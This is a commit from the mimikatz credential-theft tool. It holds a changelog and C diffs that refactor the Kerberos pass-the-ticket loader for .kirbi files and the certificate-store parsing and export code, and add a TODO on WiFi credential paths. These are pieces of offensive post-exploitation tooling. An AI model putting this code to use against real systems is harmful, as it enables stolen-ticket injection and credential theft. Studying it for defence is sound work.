Lots of internals and 2003 SP1 support

- [new] sekurlsa module and its kerberos submodule now work with old 2003 SP1 (live or dump)
- [remove] misc::wifi with WLanAPI will be replaced with dpapi::wifi raw access
- [fix] crypto::certificate buffer free at the right place
- [internal] new kull_m_file Find function with callback
- [internal] removed kull_m_file functions (read/write/file exist) with environment-variables, now used for all command-lines
- [internal] kull_m_crypto_hash better checks for CRC32 trick
- [internal] mimilove for Windows 2000 banner update
- [internal] crypto::system now works with buffers (for future registry access)
- [internal] kerberos::ptt & crypto::system call kull_m_file_Find instead of their own implementation
- [internal] remove CrtlHandler, from mimikatz main modules, when exiting to let PowerShell clean
- [internal] expand command lines environment-variables from mimikatz main modules

mimikatz/mimikatz.c

@@ -44,7 +44,7 @@ int wmain(int argc, wchar_t * argv[])
 		L" ## \\ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )\n"
 		L" '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)\n"
 		L"  '#####'    " MIMIKATZ_SPECIAL L" with %2u modules * * */\n", ARRAYSIZE(mimikatz_modules));
-	
+
 	mimikatz_initOrClean(TRUE);
 	for(i = MIMIKATZ_AUTO_COMMAND_START ; (i < argc) && (status != STATUS_FATAL_APP_EXIT) ; i++)
 	{
@@ -66,6 +66,7 @@ int wmain(int argc, wchar_t * argv[])
 #endif
 	mimikatz_initOrClean(FALSE);
 #ifndef _WINDLL
+	SetConsoleCtrlHandler(HandlerRoutine, FALSE);
 	kull_m_output_clean();
 #endif
 	return STATUS_SUCCESS;
@@ -111,13 +112,18 @@ NTSTATUS mimikatz_initOrClean(BOOL Init)
 NTSTATUS mimikatz_dispatchCommand(wchar_t * input)
 {
 	NTSTATUS status;
-	switch(input[0])
+	PWCHAR full;
+	if(full = kull_m_file_fullPath(input))
+	{
+	switch(full[0])
 	{
 	case L'!':
-		status = kuhl_m_kernel_do(input + 1);
+		status = kuhl_m_kernel_do(full + 1);
 		break;
 	default:
-		status = mimikatz_doLocal(input);
+		status = mimikatz_doLocal(full);
+	}
+	LocalFree(full);
 	}
 	return status;
 }

mimikatz/modules/dpapi/kuhl_m_dpapi.c

@@ -22,7 +22,7 @@ const KUHL_M kuhl_m_dpapi = {
 	L"dpapi",	L"DPAPI Module (by API or RAW access)", L"Data Protection application programming interface",
 	ARRAYSIZE(kuhl_m_c_dpapi), kuhl_m_c_dpapi, NULL, kuhl_m_dpapi_oe_clean
 };
-
+// to do: package WiFi (HKLM\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces\* && %ProgramData%\Microsoft\Wlansvc\Profiles\Interfaces\*) with MSXML (https://msdn.microsoft.com/en-us/library/ms767609.aspx)
 NTSTATUS kuhl_m_dpapi_blob(int argc, wchar_t * argv[])
 {
 	DATA_BLOB dataIn, dataOut;

mimikatz/modules/dpapi/packages/kuhl_m_dpapi_creds.c

@@ -88,7 +88,6 @@ NTSTATUS kuhl_m_dpapi_vault(int argc, wchar_t * argv[])
 															{
 																if(isAttr)
 																{
-
 																	kull_m_string_wprintf_hex(buffer, len, 0);
 																}
 																else

mimikatz/modules/kerberos/kuhl_m_kerberos.c

@@ -58,59 +58,30 @@ NTSTATUS LsaCallKerberosPackage(PVOID ProtocolSubmitBuffer, ULONG SubmitBufferLe
 
 NTSTATUS kuhl_m_kerberos_ptt(int argc, wchar_t * argv[])
 {
-	HANDLE hFind;
-	BOOL bFind = TRUE;
-	WIN32_FIND_DATA fData;
-	DWORD dwAttrib;
-	wchar_t fullpath[0xffff];
-	int i, j;
-
+	int i;
 	for(i = 0; i < argc; i++)
 	{
-		dwAttrib = GetFileAttributes(argv[i]);
-		if((dwAttrib != INVALID_FILE_ATTRIBUTES) && (dwAttrib & FILE_ATTRIBUTE_DIRECTORY))
+		if(PathIsDirectory(argv[i]))
 		{
-			kprintf(L"%3u - Directory \'%s\' (*.kirbi)\n", i, argv[i]);
-			if(wcscpy_s(fullpath, ARRAYSIZE(fullpath), argv[i]) == 0)
-			{
-				if(wcscat_s(fullpath, ARRAYSIZE(fullpath), L"\\*.kirbi") == 0)
-				{
-					hFind = FindFirstFile(fullpath, &fData);
-					if(hFind != INVALID_HANDLE_VALUE)
-					{
-						j = 0;
-						do
-						{
-							if(!(fData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
-							{
-								if(wcscpy_s(fullpath, ARRAYSIZE(fullpath), argv[i]) == 0)
-								{
-									if(wcscat_s(fullpath, ARRAYSIZE(fullpath), L"\\") == 0)
-									{
-										if(wcscat_s(fullpath, ARRAYSIZE(fullpath), fData.cFileName) == 0)
-										{
-											kprintf(L"   %3u - File \'%s\' : ", j, fData.cFileName);
-											kuhl_m_kerberos_ptt_file(fullpath);
-										}
-									}
-								}
-							}
-							j++;
-						} while(bFind = FindNextFile(hFind, &fData));
-						FindClose(hFind);
-					}
-				}
-			}
+			kprintf(L"* Directory: \'%s\'\n", argv[i]);
+			kull_m_file_Find(argv[i], L"*.kirbi", FALSE, 0, FALSE, kuhl_m_kerberos_ptt_directory, NULL);
 		}
 		else
-		{
-			kprintf(L"%3u - File \'%s\' : ", i, argv[i]);
-			kuhl_m_kerberos_ptt_file(argv[i]);
-		}
+			kuhl_m_kerberos_ptt_directory(0, argv[i], PathFindFileName(argv[i]), NULL);
 	}
 	return STATUS_SUCCESS;
 }
 
+BOOL CALLBACK kuhl_m_kerberos_ptt_directory(DWORD level, PCWCHAR fullpath, PCWCHAR path, PVOID pvArg)
+{
+	if(fullpath)
+	{
+		kprintf(L"\n* File: \'%s\': ", fullpath);
+		kuhl_m_kerberos_ptt_file(fullpath);
+	}
+	return TRUE;
+}
+
 void kuhl_m_kerberos_ptt_file(PCWCHAR filename)
 {
 	PBYTE fileData;

mimikatz/modules/kerberos/kuhl_m_kerberos.h

@@ -33,6 +33,7 @@ NTSTATUS kuhl_m_kerberos_clean();
 NTSTATUS LsaCallKerberosPackage(PVOID ProtocolSubmitBuffer, ULONG SubmitBufferLength, PVOID *ProtocolReturnBuffer, PULONG ReturnBufferLength, PNTSTATUS ProtocolStatus);
 
 NTSTATUS kuhl_m_kerberos_ptt(int argc, wchar_t * argv[]);
+BOOL CALLBACK kuhl_m_kerberos_ptt_directory(DWORD level, PCWCHAR fullpath, PCWCHAR path, PVOID pvArg);
 void kuhl_m_kerberos_ptt_file(PCWCHAR filename);
 NTSTATUS kuhl_m_kerberos_ptt_data(PVOID data, DWORD dataSize);
 NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[]);

mimikatz/modules/kuhl_m_crypto.c

@@ -212,7 +212,6 @@ NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[])
 						if(CertGetNameString(pCertContext, nameSrc[j], 0, NULL, certName, dwSizeNeeded) == dwSizeNeeded)
 						{
 							kprintf(L"%2u. %s\n", i, certName);
-
 							dwSizeNeeded = 0;
 							if(CertGetCertificateContextProperty(pCertContext, CERT_KEY_PROV_INFO_PROP_ID, NULL, &dwSizeNeeded))
 							{
@@ -255,8 +254,8 @@ NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[])
 
 										} else PRINT_ERROR_AUTO(L"CryptAcquireCertificatePrivateKey");
 									} else PRINT_ERROR_AUTO(L"CertGetCertificateContextProperty");
+									LocalFree(pBuffer);
 								}
-								LocalFree(pBuffer);
 								if(!export)
 									kprintf(L"\n");
 							}
@@ -724,72 +723,98 @@ NTSTATUS kuhl_m_crypto_hash(int argc, wchar_t * argv[])
 	return STATUS_SUCCESS;
 }
 
-NTSTATUS kuhl_m_crypto_system(int argc, wchar_t * argv[])
+BOOL kuhl_m_crypto_system_data(PBYTE data, DWORD len, PCWCHAR originalName, BOOL isExport)
 {
-	PBYTE fileData;
-	DWORD fileLenght;
+	BOOL status = FALSE;
+	PCWCHAR name;
 	PKUHL_M_CRYPTO_CERT_PROP prop;
 	PKUHL_M_CRYPTO_CRYPT_KEY_PROV_INFO provInfo;
-	PCWCHAR name, infile;
 
-	if(kull_m_string_args_byName(argc, argv, L"file", &infile, NULL)) // TODO: registry & hive
+	for(prop = (PKUHL_M_CRYPTO_CERT_PROP) data; (PBYTE) prop < (data + len); prop = (PKUHL_M_CRYPTO_CERT_PROP) ((PBYTE) prop + FIELD_OFFSET(KUHL_M_CRYPTO_CERT_PROP, data) + prop->size))
 	{
-		if(kull_m_file_readData(infile, &fileData, &fileLenght))
+		name = kull_m_crypto_cert_prop_id_to_name(prop->dwPropId);
+		kprintf(L"[%04x/%x] %s\n", prop->dwPropId, prop->flags, name ? name : L"?");
+		if(prop->size)
 		{
-			for(prop = (PKUHL_M_CRYPTO_CERT_PROP) fileData; (PBYTE) prop < (fileData + fileLenght); prop = (PKUHL_M_CRYPTO_CERT_PROP) ((PBYTE) prop + FIELD_OFFSET(KUHL_M_CRYPTO_CERT_PROP, data) + prop->size))
+			kprintf(L"  ");
+			switch(prop->dwPropId)
 			{
-				name = kull_m_crypto_cert_prop_id_to_name(prop->dwPropId);
-				kprintf(L"[%04x/%x] %s\n", prop->dwPropId, prop->flags, name ? name : L"?");
-				if(prop->size)
-				{
-					kprintf(L"  ");
-					switch(prop->dwPropId)
-					{
-					case CERT_KEY_PROV_INFO_PROP_ID:
-						kprintf(L"Provider info:\n");
-						provInfo = (PKUHL_M_CRYPTO_CRYPT_KEY_PROV_INFO) prop->data;
-						if(provInfo->offsetContainerName)
-							kprintf(L"\tKey Container  : %s\n", prop->data + provInfo->offsetContainerName);
-						if(provInfo->offsetProvName)
-							kprintf(L"\tProvider       : %s\n", prop->data + provInfo->offsetProvName);
-						name = kull_m_crypto_provider_type_to_name(provInfo->dwProvType);
-						kprintf(L"\tProvider type  : %s (%u)\n", name ? name : L"?", provInfo->dwProvType);
-						kprintf(L"\tType           : %s (0x%08x)\n", kull_m_crypto_keytype_to_str(provInfo->dwKeySpec), provInfo->dwKeySpec);
-						kprintf(L"\tFlags          : %08x\n", provInfo->dwFlags);
-						kprintf(L"\tParam (todo)   : %08x / %08x\n", provInfo->cProvParam, provInfo->offsetRgProvParam);
-						break;
-					case CERT_FRIENDLY_NAME_PROP_ID:
-					case CERT_OCSP_CACHE_PREFIX_PROP_ID:
-						kprintf(L"%.*s", prop->size / sizeof(wchar_t), prop->data);
-						break;
-					case CERT_cert_file_element:
-					case CERT_crl_file_element:
-					case CERT_ctl_file_element:
-					case CERT_keyid_file_element:
-						kuhl_m_crypto_file_rawData(prop, infile, kull_m_string_args_byName(argc, argv, L"export", NULL, NULL));
-						break;
-					case CERT_SHA1_HASH_PROP_ID:
-					case CERT_MD5_HASH_PROP_ID :
-					case CERT_SIGNATURE_HASH_PROP_ID:
-					case CERT_ISSUER_PUBLIC_KEY_MD5_HASH_PROP_ID:
-					case CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID:
-					case CERT_ISSUER_SERIAL_NUMBER_MD5_HASH_PROP_ID:
-					case CERT_SUBJECT_NAME_MD5_HASH_PROP_ID:
-					case CERT_KEY_IDENTIFIER_PROP_ID:
-						//
-					default:
-						kull_m_string_wprintf_hex(prop->data, prop->size, 0);
-						break;
-					}
-					kprintf(L"\n");
-				}
-
+			case CERT_KEY_PROV_INFO_PROP_ID:
+				kprintf(L"Provider info:\n");
+				provInfo = (PKUHL_M_CRYPTO_CRYPT_KEY_PROV_INFO) prop->data;
+				if(provInfo->offsetContainerName)
+					kprintf(L"\tKey Container  : %s\n", prop->data + provInfo->offsetContainerName);
+				if(provInfo->offsetProvName)
+					kprintf(L"\tProvider       : %s\n", prop->data + provInfo->offsetProvName);
+				name = kull_m_crypto_provider_type_to_name(provInfo->dwProvType);
+				kprintf(L"\tProvider type  : %s (%u)\n", name ? name : L"?", provInfo->dwProvType);
+				kprintf(L"\tType           : %s (0x%08x)\n", kull_m_crypto_keytype_to_str(provInfo->dwKeySpec), provInfo->dwKeySpec);
+				kprintf(L"\tFlags          : %08x\n", provInfo->dwFlags);
+				kprintf(L"\tParam (todo)   : %08x / %08x\n", provInfo->cProvParam, provInfo->offsetRgProvParam);
+				break;
+			case CERT_FRIENDLY_NAME_PROP_ID:
+			case CERT_OCSP_CACHE_PREFIX_PROP_ID:
+			case 101: //CERT_SMART_CARD_READER_PROP_ID
+				kprintf(L"%.*s", prop->size / sizeof(wchar_t), prop->data);
+				break;
+			case CERT_cert_file_element:
+			case CERT_crl_file_element:
+			case CERT_ctl_file_element:
+			case CERT_keyid_file_element:
+				kuhl_m_crypto_file_rawData(prop, originalName, isExport);
+				break;
+			case CERT_SHA1_HASH_PROP_ID:
+			case CERT_MD5_HASH_PROP_ID :
+			case CERT_SIGNATURE_HASH_PROP_ID:
+			case CERT_ISSUER_PUBLIC_KEY_MD5_HASH_PROP_ID:
+			case CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID:
+			case CERT_ISSUER_SERIAL_NUMBER_MD5_HASH_PROP_ID:
+			case CERT_SUBJECT_NAME_MD5_HASH_PROP_ID:
+			case CERT_KEY_IDENTIFIER_PROP_ID:
+				//
+			default:
+				kull_m_string_wprintf_hex(prop->data, prop->size, 0);
+				break;
 			}
+			kprintf(L"\n");
+		}
+	}
+
+	return status;
+}
+
+BOOL CALLBACK kuhl_m_crypto_system_directory(DWORD level, PCWCHAR fullpath, PCWCHAR path, PVOID pvArg)
+{
+	PBYTE fileData;
+	DWORD fileLenght;
+	if(fullpath)
+	{
+		kprintf(L"\n* File: \'%s\'\n", fullpath);
+		if(kull_m_file_readData(fullpath, &fileData, &fileLenght))
+		{
+			kuhl_m_crypto_system_data(fileData, fileLenght, fullpath, *(PBOOL) pvArg);
 			LocalFree(fileData);
 		}
-		else PRINT_ERROR_AUTO(L"kull_m_file_readData");
 	}
-	else PRINT_ERROR(L"Input Microsoft Crypto Certificate file needed (/in:file)\n");
+	return TRUE;
+}
+
+NTSTATUS kuhl_m_crypto_system(int argc, wchar_t * argv[])
+{
+	BOOL isExport = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL);
+	PCWCHAR infile;
+
+	if(kull_m_string_args_byName(argc, argv, L"file", &infile, NULL)) // TODO: registry & hive
+	{
+		if(PathIsDirectory(infile))
+		{
+			kprintf(L"* Directory: \'%s\'\n", infile);
+			kull_m_file_Find(infile, NULL, FALSE, 0, FALSE, kuhl_m_crypto_system_directory, &isExport);
+		}
+		else
+			kuhl_m_crypto_system_directory(0, infile, PathFindFileName(infile), &isExport);
+	}
+	else PRINT_ERROR(L"Input Microsoft Crypto Certificate file needed (/file:filename|directory)\n");
 	return STATUS_SUCCESS;
 }